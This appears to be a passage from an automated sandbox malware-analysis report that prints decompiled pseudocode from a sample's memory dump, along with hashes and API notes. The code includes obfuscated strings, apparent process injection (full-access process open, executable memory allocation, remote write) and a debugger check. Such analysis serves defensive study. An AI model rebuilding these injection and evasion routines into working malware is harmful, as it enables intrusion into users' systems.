							_v212 = 0;
							_v208 = _v28;
							_v204 = 5;
							_v200 = 0;
							_v196 = 5;
							_v192 = 0;
							_v188 = 5;
							_v184 = 0;
							_v180 = 5;
							_v176 = 0;
							_v172 = 5;
							L00455C58("cEZZFHW4pjNUx4Z3haWDpG",  &_v220);
							_t201 = E004560E8(E0045908C(_t286, _t348, _t350, _v220,  &_v216, 5));
							__eflags = _t201;
							if(_t201 == 0) {
								L36:
								_t348 = E0045CB08(_t350, _t286, 0, 0, _t350,  &_v40, 0, 0, _v28);
								__eflags = _a12;
								if(__eflags == 0) {
									L41:
									E0045AFA4(_t350, _t286);
									__eflags = _t286;
									if(_t286 != 0) {
										 *_a8 = _v56;
									}
									E0045ACDC(_t348, _t286,  &_v36, _t350);
									__eflags = _v36 - 0x103;
									if(_v36 == 0x103) {
										_v17 = 1;
									}
									goto L45;
								}
								E0045A4DC(0x320);
								L00455C58("+5Wep51",  &_v240);
								E0045A598(_v240, _t286,  &_v236, _t348, _t350, __eflags);
								_t213 = E004049DC(_v236);
								_push(_t213);
								_push(0);
								_push(0x1f0001);
								L00406C40();
								__eflags = _t213;
								if(__eflags != 0) {
									E0045A5E4(_t286, _t348, _t350, __eflags);
									goto L41;
								}
								E0045AFA4(_t213, _t286);
								goto L45;
							}
							L00455C58("cEZjp58e7HK6hE7",  &_v224);
							_t221 = E004560E8(E0045908C(_t286, _t348, _t350, _v224,  &_v220, 0xffffffff));
							__eflags = _t221;
							if(_t221 == 0) {
								goto L36;
							}
							__eflags = _a12;
							if(__eflags == 0) {
								goto L41;
							}
							E0045A4DC(0x320);
							L00455C58("+5Wep51",  &_v232);
							E0045A598(_v232, _t286,  &_v228, _t348, _t350, __eflags);
							_t229 = E004049DC(_v228);
							_push(_t229);
							_push(0);
							_push(0x1f0001);
							L00406C40();
							__eflags = _t229;
							if(__eflags != 0) {
								E0045A5E4(_t286, _t348, _t350, __eflags);
								goto L41;
							}
							E0045AFA4(_t229, _t286);
							goto L36;
						}
					}
					__eflags = _v8;
					if(_v8 == 0) {
						_t315 =  &_v8;
						L00455C58("xq4uRaWkp7",  &_v8);
					}
					__eflags =  *((char*)( *0x46efcc));
					if(__eflags != 0) {
						L00457B18( &_v8, _t286, _t315, _t349, __eflags);
					}
					L0040708C();
					L0040708C();
					_v132 = 0x44;
					_v84 = 0;
					_v88 = 1;
					L00455C58("xq4uRaWkp7",  &_v164);
					E00404928(_v8, _v164);
					if(__eflags != 0) {
						_t351 = 4;
					} else {
						_t351 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_push(0);
						_push(0);
						_push(_t351);
						_push(0);
						_push(0);
						_push( &_v132);
						_push( &_v64);
						_push(E004049DC(_v12));
						_t251 = E004049DC(_v8);
						__eflags = 0;
						_pop(_t341);
						E0045C634(_t251, _t286, 0, _t341, _t348, _t351);
					} else {
						__eflags = E0045C634(0, _t286, 0, E004049DC(_v8), _t348, _t351,  &_v64,  &_v132, 0, 0, _t351, 0, 0);
						if(__eflags == 0) {
							__eflags = E0045C634(E004049DC(_v8), _t286, 0, 0, _t348, _t351,  &_v64,  &_v132, 0, 0, _t351, 0, 0);
							if(__eflags == 0) {
								_push(0);
								_push(0);
								_push(_t351);
								_push(0);
								_push(0);
								_push( &_v132);
								_push( &_v64);
								_push(E004049DC(_v8));
								_t271 = E004049DC(_v8);
								_pop(_t345);
								E0045C634(_t271, _t286, 0, _t345, _t348, _t351);
							}
						}
					}
					 *_a8 = _v56;
					_v24 = _v60;
					_t350 = _v64;
					goto L24;
				} else {
					L00455C58("xqSlhEWUF0WuCPY6",  &_v144);
					E00454A48(_v144, _t286);
					L45:
					_pop(_t316);
					 *[fs:eax] = _t316;
					_push(0x456d09);
					E00404524( &_v240, 6);
					E00404524( &_v168, 9);
					E00404524( &_v48, 2);
					return E00404524( &_v16, 3);
				}
			}


































































                                                          0x00456778
                                                          0x00456778
                                                          0x00456779
                                                          0x0045677c
                                                          0x00456781
                                                          0x00456781
                                                          0x00456783
                                                          0x00456785
                                                          0x00456785
                                                          0x00456788
                                                          0x00456788
                                                          0x0045678b
                                                          0x0045678c
                                                          0x0045678d
                                                          0x0045678e
                                                          0x00456791
                                                          0x00456794
                                                          0x00456797
                                                          0x0045679d
                                                          0x004567a5
                                                          0x004567ad
                                                          0x004567b4
                                                          0x004567b5
                                                          0x004567ba
                                                          0x004567bd
                                                          0x004567c0
                                                          0x004567d8
                                                          0x004567e3
                                                          0x004567ef
                                                          0x004567fa
                                                          0x004567fb
                                                          0x00456800
                                                          0x0045682a
                                                          0x00456838
                                                          0x0045683d
                                                          0x00456840
                                                          0x00456848
                                                          0x00456852
                                                          0x00456862
                                                          0x00456872
                                                          0x00456874
                                                          0x00456881
                                                          0x0045688c
                                                          0x0045688c
                                                          0x0045689c
                                                          0x004568aa
                                                          0x004568af
                                                          0x004568ba
                                                          0x004568c5
                                                          0x004568ca
                                                          0x004568cc
                                                          0x00000000
                                                          0x00000000
                                                          0x004568d2
                                                          0x004568d4
                                                          0x00456a13
                                                          0x00456a17
                                                          0x00456a41
                                                          0x00000000
                                                          0x00456a41
                                                          0x00456a2a
                                                          0x00456a4b
                                                          0x00456a5f
                                                          0x00456a62
                                                          0x00456a66
                                                          0x00456a74
                                                          0x00456a7d
                                                          0x00456a7d
                                                          0x00456a93
                                                          0x00456a98
                                                          0x00456a9f
                                                          0x00456ab4
                                                          0x00456ab4
                                                          0x00456ab9
                                                          0x00456abb
                                                          0x00456c77
                                                          0x00456c85
                                                          0x00456c8e
                                                          0x00000000
                                                          0x00456ac1
                                                          0x00456acc
                                                          0x00456ada
                                                          0x00456adf
                                                          0x00000000
                                                          0x00000000
                                                          0x00456aea
                                                          0x00456af0
                                                          0x00456afa
                                                          0x00456b00
                                                          0x00456b09
                                                          0x00456b0f
                                                          0x00456b18
                                                          0x00456b1e
                                                          0x00456b27
                                                          0x00456b2d
                                                          0x00456b36
                                                          0x00456b3c
                                                          0x00456b55
                                                          0x00456b66
                                                          0x00456b6b
                                                          0x00456b6d
                                                          0x00456c03
                                                          0x00456c1a
                                                          0x00456c1c
                                                          0x00456c20
                                                          0x00456c90
                                                          0x00456c92
                                                          0x00456c97
                                                          0x00456c99
                                                          0x00456ca1
                                                          0x00456ca1
                                                          0x00456ca8
                                                          0x00456cad
                                                          0x00456cb4
                                                          0x00456cb6
                                                          0x00456cb6
                                                          0x00000000
                                                          0x00456cb4
                                                          0x00456c27
                                                          0x00456c37
                                                          0x00456c48
                                                          0x00456c53
                                                          0x00456c58
                                                          0x00456c59
                                                          0x00456c5b
                                                          0x00456c60
                                                          0x00456c65
                                                          0x00456c67
                                                          0x00456c70
                                                          0x00000000
                                                          0x00456c70
                                                          0x00456c69
                                                          0x00000000
                                                          0x00456c69
                                                          0x00456b87
                                                          0x00456b98
                                                          0x00456b9d
                                                          0x00456b9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00456ba1
                                                          0x00456ba5
                                                          0x00000000
                                                          0x00000000
                                                          0x00456bb0
                                                          0x00456bc0
                                                          0x00456bd1
                                                          0x00456bdc
                                                          0x00456be1
                                                          0x00456be2
                                                          0x00456be4
                                                          0x00456be9
                                                          0x00456bee
                                                          0x00456bf0
                                                          0x00456bf9
                                                          0x00000000
                                                          0x00456bf9
                                                          0x00456bf2
                                                          0x00000000
                                                          0x00456bf2
                                                          0x00456abb
                                                          0x004568da
                                                          0x004568de
                                                          0x004568e0
                                                          0x004568e8
                                                          0x004568e8
                                                          0x004568f2
                                                          0x004568f5
                                                          0x004568fa
                                                          0x004568fa
                                                          0x00456907
                                                          0x00456914
                                                          0x00456919
                                                          0x00456920
                                                          0x00456926
                                                          0x00456938
                                                          0x00456946
                                                          0x0045694b
                                                          0x00456951
                                                          0x0045694d
                                                          0x0045694d
                                                          0x0045694d
                                                          0x00456956
                                                          0x0045695a
                                                          0x004569d6
                                                          0x004569d8
                                                          0x004569da
                                                          0x004569db
                                                          0x004569dd
                                                          0x004569e2
                                                          0x004569e6
                                                          0x004569ef
                                                          0x004569f3
                                                          0x004569f8
                                                          0x004569fa
                                                          0x004569fb
                                                          0x0045695c
                                                          0x00456980
                                                          0x00456982
                                                          0x004569a6
                                                          0x004569a8
                                                          0x004569aa
                                                          0x004569ac
                                                          0x004569ae
                                                          0x004569af
                                                          0x004569b1
                                                          0x004569b6
                                                          0x004569ba
                                                          0x004569c3
                                                          0x004569c7
                                                          0x004569ce
                                                          0x004569cf
                                                          0x004569cf
                                                          0x004569a8
                                                          0x00456982
                                                          0x00456a06
                                                          0x00456a0b
                                                          0x00456a0e
                                                          0x00000000
                                                          0x00456802
                                                          0x0045680d
                                                          0x00456818
                                                          0x00456cba
                                                          0x00456cbc
                                                          0x00456cbf
                                                          0x00456cc2
                                                          0x00456cd2
                                                          0x00456ce2
                                                          0x00456cef
                                                          0x00456d01
                                                          0x00456d01

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: AttributesChangeCloseFileFindNotification
                                                          • String ID: +5Wep51$D$cEZZFHW4pjNUx4Z3haWDpG$cEZjp58e7HK6hE7$cW3$xmvhF0WXhG$xmvhF0WXhNKD$xq4uRaWkp7$xqSlhEWUF0WuCPY6$}F
                                                          • API String ID: 1165628546-3118009159
                                                          • Opcode ID: 618e7471a2e185a4527667531e7119b5efd4ad20bfd98087ab51d461139cd03c
                                                          • Instruction ID: a3dbc95727ec73f69a895294a9803b31fee963c2aff3f94a1830a1f4a7f269ab
                                                          • Opcode Fuzzy Hash: 618e7471a2e185a4527667531e7119b5efd4ad20bfd98087ab51d461139cd03c
                                                          • Instruction Fuzzy Hash: 06E1A770A002089FDB11EBA5CC41BDEB7B5EF45305F5081ABF908B7283DB786E498B59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045652C Relevance: 2.7, Strings: 2, Instructions: 196COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 85%
                                                          			E0045652C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, char _a4) {
				char _v8;
				char _v12;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v44;
				short _v64;
				intOrPtr _v68;
				char _v112;
				char _v116;
				intOrPtr _v176;
				void* _t66;
				void* _t72;
				char _t74;
				void* _t81;
				void* _t89;
				void* _t103;
				void* _t105;
				void* _t113;
				void* _t115;
				void* _t125;
				void* _t140;
				intOrPtr _t141;
				void* _t153;
				void* _t157;
				intOrPtr* _t158;
				char _t160;

				_t154 = __esi;
				_t153 = __edi;
				_t158 = _t157 + 0xffffff90;
				_push(__ebx);
				_v116 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E004049CC(_v8);
				E004049CC(_v12);
				_push(_t157);
				_push(0x456751);
				_push( *[fs:eax]);
				 *[fs:eax] = _t158;
				if(_a4 == 0) {
					_t140 = 0;
					_t125 = E0045AA10(0x1f0fff, __ecx, __ecx, 0, __esi);
					__eflags = _t125;
					if(_t125 == 0) {
						L18:
						_pop(_t141);
						 *[fs:eax] = _t141;
						_push(0x456758);
						E00404500( &_v116);
						return E00404524( &_v12, 2);
					}
					L10:
					_v20 = E004560F0(_t125, _t153, _t154, _t161, _t125, 0, E004047DC(_v12), 0x1000, 0x40);
					if(_v20 == 0) {
						_t89 = E004047DC(_v12);
						_t140 = 0;
						_v20 = E0045C79C(_t125, _t125, _t89, 0, _t153, _t154, 0x40, 0x1000);
					}
					_t66 = E004047DC(_v12);
					E004561CC(_t125, _t153, _t154, 0, _t125, _v20, E00404A34( &_v12), _t66,  &_v24);
					_t72 = E004047DC(_v12);
					asm("cdq");
					_push(_t140);
					_push(_t72 - 2);
					_t74 = _v24;
					if(0 != _v176) {
						if(__eflags >= 0) {
							goto L17;
						}
						goto L16;
					} else {
						if(_t74 >=  *_t158) {
							L17:
							E0045CB08(_t125, _t125, 0, 0, _t154,  &_v28, 0, 0, _v20);
							goto L18;
						}
						L16:
						_t81 = E004047DC(_v12);
						L0045BA78(_t125, _t125, E00404A34( &_v12), _v20, _t154,  &_v24, _t81);
						goto L17;
					}
				}
				_t160 = _v8;
				if(_t160 == 0) {
					L00455C58("xq4uRaWkp7",  &_v8);
				}
				L0040708C();
				L0040708C();
				_v112 = 0x44;
				_v64 = 0;
				_v68 = 1;
				L00455C58("xq4uRaWkp7",  &_v116);
				E00404928(_v8, _v116);
				if(_t160 != 0) {
					_t103 = E004049DC(_v8);
					_t126 = _t103;
					_t140 = _t103;
					_t105 = E0045C634(0, _t103, 0, _t140, _t153, _t154,  &_v44,  &_v112, 0, 0, 4, 0, 0);
					__eflags = _t105;
					if(_t105 == 0) {
						_t140 = 0;
						__eflags = 0;
						E0045C634(_t126, _t126, 0, 0, _t153, _t154,  &_v44,  &_v112, 0, 0, 4, 0, 0);
					}
				} else {
					_t113 = E004049DC(_v8);
					_t127 = _t113;
					_t140 = _t113;
					_t115 = E0045C634(0, _t113, 0, _t140, _t153, _t154,  &_v44,  &_v112, 0, 0, 0, 0, 0);
					_t161 = _t115;
					if(_t115 == 0) {
						_t140 = 0;
						E0045C634(_t127, _t127, 0, 0, _t153, _t154,  &_v44,  &_v112, 0, 0, 0, 0, 0);
					}
				}
				_t125 = _v44;
				goto L10;
			}






























                                                          0x0045652c
                                                          0x0045652c
                                                          0x0045652f
                                                          0x00456532
                                                          0x00456535
                                                          0x0045653a
                                                          0x0045653d
                                                          0x00456543
                                                          0x0045654b
                                                          0x00456552
                                                          0x00456553
                                                          0x00456558
                                                          0x0045655b
                                                          0x00456562
                                                          0x0045665c
                                                          0x00456668
                                                          0x0045666a
                                                          0x0045666c
                                                          0x0045672e
                                                          0x00456730
                                                          0x00456733
                                                          0x00456736
                                                          0x0045673e
                                                          0x00456750
                                                          0x00456750
                                                          0x00456672
                                                          0x0045668a
                                                          0x00456691
                                                          0x0045669d
                                                          0x004566a4
                                                          0x004566ad
                                                          0x004566ad
                                                          0x004566b7
                                                          0x004566cb
                                                          0x004566d3
                                                          0x004566db
                                                          0x004566dc
                                                          0x004566dd
                                                          0x004566de
                                                          0x004566e7
                                                          0x004566f4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004566e9
                                                          0x004566ee
                                                          0x00456717
                                                          0x00456729
                                                          0x00000000
                                                          0x00456729
                                                          0x004566f6
                                                          0x004566f9
                                                          0x00456712
                                                          0x00000000
                                                          0x00456712
                                                          0x004566e7
                                                          0x00456568
                                                          0x0045656c
                                                          0x00456576
                                                          0x00456576
                                                          0x00456583
                                                          0x00456590
                                                          0x00456595
                                                          0x0045659c
                                                          0x004565a2
                                                          0x004565b1
                                                          0x004565bc
                                                          0x004565c1
                                                          0x00456622
                                                          0x00456627
                                                          0x00456629
                                                          0x0045662f
                                                          0x00456634
                                                          0x00456636
                                                          0x0045664e
                                                          0x0045664e
                                                          0x00456650
                                                          0x00456650
                                                          0x004565c3
                                                          0x004565d8
                                                          0x004565dd
                                                          0x004565df
                                                          0x004565e5
                                                          0x004565ea
                                                          0x004565ec
                                                          0x00456604
                                                          0x00456606
                                                          0x00456606
                                                          0x004565ec
                                                          0x00456655
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D$xq4uRaWkp7
                                                          • API String ID: 0-2745843302
                                                          • Opcode ID: 21108f33afe8ef012c0de6844adb947f79e71d12a2158b0643d7ff9832ae7faf
                                                          • Instruction ID: 534022d9d4038136160a0f900c4bbd816f907923284b4ddf965a856d67b7d687
                                                          • Opcode Fuzzy Hash: 21108f33afe8ef012c0de6844adb947f79e71d12a2158b0643d7ff9832ae7faf
                                                          • Instruction Fuzzy Hash: 45513671B04208AFDB14EAA5CC82BDFB7B9AB48305F51443BF605F7182DB7899098B5C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00428120 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E00428120(void* __eax, void* __edx) {
				void* _t7;

				_t7 = __eax;
				return  *0x46af9c(_t7, __edx, E004280E4(__edx));
			}




                                                          0x00428124
                                                          0x00428138

                                                          APIs
                                                          • bind.WS2_32(000000FF,?,00000000), ref: 00428130
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: bind
                                                          • String ID:
                                                          • API String ID: 1187836755-0
                                                          • Opcode ID: ecb19e219236b03f66d4c91561c28552d8394996d8899dee8b06f22479885405
                                                          • Instruction ID: be93944b6830399a07b6e7c929bb2f6d8e77dfa8a2d384a963574ad39b9a0a9c
                                                          • Opcode Fuzzy Hash: ecb19e219236b03f66d4c91561c28552d8394996d8899dee8b06f22479885405
                                                          • Instruction Fuzzy Hash: 04C09BE1312D346F5255666D2CC4CEB518CCD4D19D3058077F505D2112D7544C1546B6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00428238 Relevance: 1.5, APIs: 1, Instructions: 12networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID:
                                                          • API String ID: 1507349165-0
                                                          • Opcode ID: 21f6edef8d7ed5a6d2079a86e8eec99937be0fb3d74abcfd933d254879f9adc0
                                                          • Instruction ID: 821f3582d7042118d624f2b1c45a1d930ebea4d6f374e9624a8f3d9229fe3e04
                                                          • Opcode Fuzzy Hash: 21f6edef8d7ed5a6d2079a86e8eec99937be0fb3d74abcfd933d254879f9adc0
                                                          • Instruction Fuzzy Hash: 33C09BF210430C7F65045795EDC9C77B75CE65C6557404115F6044210195756C104576
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004222B4 Relevance: .2, Instructions: 238COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004222B4(signed int __eax, void* __ecx, void* __edx) {
				void* _t69;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				void* _t119;
				void* _t150;
				signed int _t195;
				signed int _t227;
				void* _t229;

				_t229 = __ecx;
				_t195 = __eax >> 0x00000010 & 0x0000ffff;
				_t86 = __eax & 0x0000ffff;
				_t228 = __edx;
				if(__ecx != 1) {
					if(__edx != 0) {
						if(__ecx >= 0x10) {
							if(__ecx < 0x15b0) {
								L19:
								if(_t229 == 0) {
									L26:
									return _t195 << 0x00000010 | _t86;
								}
								if(_t229 < 0x10) {
									while(1) {
										L24:
										_t119 = _t229;
										_t229 = _t229 + 0xffffffff;
										if(_t119 == 0) {
											break;
										}
										_t86 = _t86;
										_t228 = _t228 + 1;
										_t195 = _t195 + _t86;
									}
									_t86 = _t86 % 0xfff1;
									_t195 = _t195 % 0xfff1;
									goto L26;
								} else {
									goto L21;
								}
								do {
									L21:
									_t229 = _t229 - 0x10;
									_t87 = _t86;
									_t88 = _t87;
									_t89 = _t88;
									_t90 = _t89;
									_t91 = _t90;
									_t92 = _t91;
									_t93 = _t92;
									_t94 = _t93;
									_t95 = _t94;
									_t96 = _t95;
									_t97 = _t96;
									_t98 = _t97;
									_t99 = _t98;
									_t100 = _t99;
									_t101 = _t100;
									_t86 = _t101;
									_t195 = _t195 + _t87 + _t88 + _t89 + _t90 + _t91 + _t92 + _t93 + _t94 + _t95 + _t96 + _t97 + _t98 + _t99 + _t100 + _t101 + _t86;
									_t228 = _t228 + 0x10;
								} while (_t229 >= 0x10);
								goto L24;
							} else {
								goto L16;
							}
							do {
								L16:
								_t229 = _t229 - 0x15b0;
								_t69 = 0x15b;
								do {
									_t102 = _t86;
									_t103 = _t102;
									_t104 = _t103;
									_t105 = _t104;
									_t106 = _t105;
									_t107 = _t106;
									_t108 = _t107;
									_t109 = _t108;
									_t110 = _t109;
									_t111 = _t110;
									_t112 = _t111;
									_t113 = _t112;
									_t114 = _t113;
									_t115 = _t114;
									_t116 = _t115;
									_t86 = _t116;
									_t195 = _t195 + _t102 + _t103 + _t104 + _t105 + _t106 + _t107 + _t108 + _t109 + _t110 + _t111 + _t112 + _t113 + _t114 + _t115 + _t116 + _t86;
									_t228 = _t228 + 0x10;
									_t69 = _t69 - 1;
								} while (_t69 != 0);
								_t86 = _t86 % 0xfff1;
								_t195 = _t195 % 0xfff1;
							} while (_t229 >= 0x15b0);
							goto L19;
						}
						while(1) {
							_t150 = _t229;
							_t229 = _t229 + 0xffffffff;
							if(_t150 == 0) {
								break;
							}
							_t86 = _t86;
							_t228 = _t228 + 1;
							_t195 = _t195 + _t86;
						}
						if(_t86 >= 0xfff1) {
							_t86 = _t86 - 0xfff1;
						}
						return _t195 % 0x0000fff1 << 0x00000010 | _t86;
					}
					return 1;
				}
				_t117 = _t86;
				if(_t117 >= 0xfff1) {
					_t117 = _t117 - 0xfff1;
				}
				_t227 = _t195 + _t117;
				if(_t227 >= 0xfff1) {
					_t227 = _t227 - 0xfff1;
				}
				return _t227 << 0x00000010 | _t117;
			}









































                                                          0x004222bf
                                                          0x004222c1
                                                          0x004222c7
                                                          0x004222d0
                                                          0x004222d2
                                                          0x00422306
                                                          0x00422315
                                                          0x00422358
                                                          0x00422428
                                                          0x0042242a
                                                          0x00422505
                                                          0x00000000
                                                          0x0042250a
                                                          0x00422433
                                                          0x004224e2
                                                          0x004224e2
                                                          0x004224e2
                                                          0x004224e4
                                                          0x004224e9
                                                          0x00000000
                                                          0x00000000
                                                          0x004224dd
                                                          0x004224df
                                                          0x004224e0
                                                          0x004224e0
                                                          0x004224f6
                                                          0x00422503
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00422439
                                                          0x00422439
                                                          0x00422439
                                                          0x00422440
                                                          0x00422449
                                                          0x00422452
                                                          0x0042245b
                                                          0x00422464
                                                          0x0042246d
                                                          0x00422476
                                                          0x0042247f
                                                          0x00422488
                                                          0x00422491
                                                          0x0042249a
                                                          0x004224a3
                                                          0x004224ac
                                                          0x004224b5
                                                          0x004224be
                                                          0x004224c7
                                                          0x004224c9
                                                          0x004224cb
                                                          0x004224ce
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0042235e
                                                          0x0042235e
                                                          0x0042235e
                                                          0x00422364
                                                          0x00422369
                                                          0x0042236d
                                                          0x00422376
                                                          0x0042237f
                                                          0x00422388
                                                          0x00422391
                                                          0x0042239a
                                                          0x004223a3
                                                          0x004223ac
                                                          0x004223b5
                                                          0x004223be
                                                          0x004223c7
                                                          0x004223d0
                                                          0x004223d9
                                                          0x004223e2
                                                          0x004223eb
                                                          0x004223f4
                                                          0x004223f6
                                                          0x004223f8
                                                          0x004223fb
                                                          0x004223fb
                                                          0x0042240d
                                                          0x0042241a
                                                          0x0042241c
                                                          0x00000000
                                                          0x0042235e
                                                          0x00422322
                                                          0x00422322
                                                          0x00422324
                                                          0x00422329
                                                          0x00000000
                                                          0x00000000
                                                          0x0042231d
                                                          0x0042231f
                                                          0x00422320
                                                          0x00422320
                                                          0x00422331
                                                          0x00422333
                                                          0x00422333
                                                          0x00000000
                                                          0x0042234b
                                                          0x00000000
                                                          0x00422308
                                                          0x004222d8
                                                          0x004222e0
                                                          0x004222e2
                                                          0x004222e2
                                                          0x004222e8
                                                          0x004222f0
                                                          0x004222f2
                                                          0x004222f2
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a46a25728c0e4dbe5aa0a1433bd48846487817f0c63754d6310f19dcd07371b1
                                                          • Instruction ID: 023084f342c357e0e18156b2f3c73eb7ccc665e74a617334b23cb43cdabd31f7
                                                          • Opcode Fuzzy Hash: a46a25728c0e4dbe5aa0a1433bd48846487817f0c63754d6310f19dcd07371b1
                                                          • Instruction Fuzzy Hash: 5B61752238D69103E33D8E7D6DE02B7DAD35FC631862ED57E94DAC3F42E89EA4165108
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00450514 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00450514(void* __eax) {
				intOrPtr* _v8;
				char _v9;
				short _v11;
				intOrPtr* _t10;
				void* _t11;

				_v8 =  *[fs:0x30];
				_t10 = _v8;
				_v11 =  *_t10;
				_v9 =  *((intOrPtr*)(_t10 + 2));
				if(_v9 == 0) {
					_t11 = 0;
				} else {
					_t11 = 1;
				}
				return _t11;
			}








                                                          0x00450522
                                                          0x00450526
                                                          0x0045052c
                                                          0x00450533
                                                          0x0045053a
                                                          0x00450540
                                                          0x0045053c
                                                          0x0045053c
                                                          0x0045053c
                                                          0x00450545

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 24687ab9ed464844eb98739ef85586ee6949eaf5617852ffb069b09ba51bb684
                                                          • Instruction ID: fa87b1b6a6b906522428d95d4908b8c07fd2c03dee743528d612246b6c7ed201
                                                          • Opcode Fuzzy Hash: 24687ab9ed464844eb98739ef85586ee6949eaf5617852ffb069b09ba51bb684
                                                          • Instruction Fuzzy Hash: FFE0863981C688ADD701CBA89442ADAB7F99F19310F2540E6C858D3392F5765604D70A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00458B34 Relevance: .0, Instructions: 2COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00458B34() {

				return  *[fs:0x30];
			}



                                                          0x00458b3b

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                                                          • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                          • Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004282EC Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 47%
                                                          			E004282EC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v44;
				void* _t29;
				void* _t74;
				void* _t82;
				intOrPtr _t85;
				void* _t94;
				void* _t100;

				_t82 = __edx;
				_t29 = memcpy( &_v44, __ecx, 8 << 2);
				_t94 = _t82;
				_t74 = _t29;
				_t97 = _a4;
				_v12 = 0;
				_push(_t100);
				_push(0x428430);
				_push( *[fs:eax]);
				 *[fs:eax] = _t100 + 0xffffffffffffffe4;
				L00403114(_a4, 0x1c);
				if(_v36 != 3) {
					E00404928(_t74, "0.0.0.0");
					if(__eflags == 0) {
						L4:
						_v44 = 1;
						_v8 =  *0x46afac(0, E004049DC(_t94),  &_v44,  &_v12);
					} else {
						E00404928(_t74, 0x42845c);
						if(__eflags != 0) {
							E00404928(_t74, "127.0.0.1");
							if(__eflags == 0) {
								L7:
								_v8 =  *0x46afac(0, E004049DC(_t94),  &_v44,  &_v12);
							} else {
								E00404928(_t74, 0x42847c);
								if(__eflags != 0) {
									_v8 =  *0x46afac(E004049DC(_t74), E004049DC(_t94),  &_v44,  &_v12);
								} else {
									goto L7;
								}
							}
						} else {
							goto L4;
						}
					}
				} else {
					_v36 = 0;
					_v32 = 0;
					_v8 =  *0x46afac(E004049DC(_t74), 0,  &_v44,  &_v12);
				}
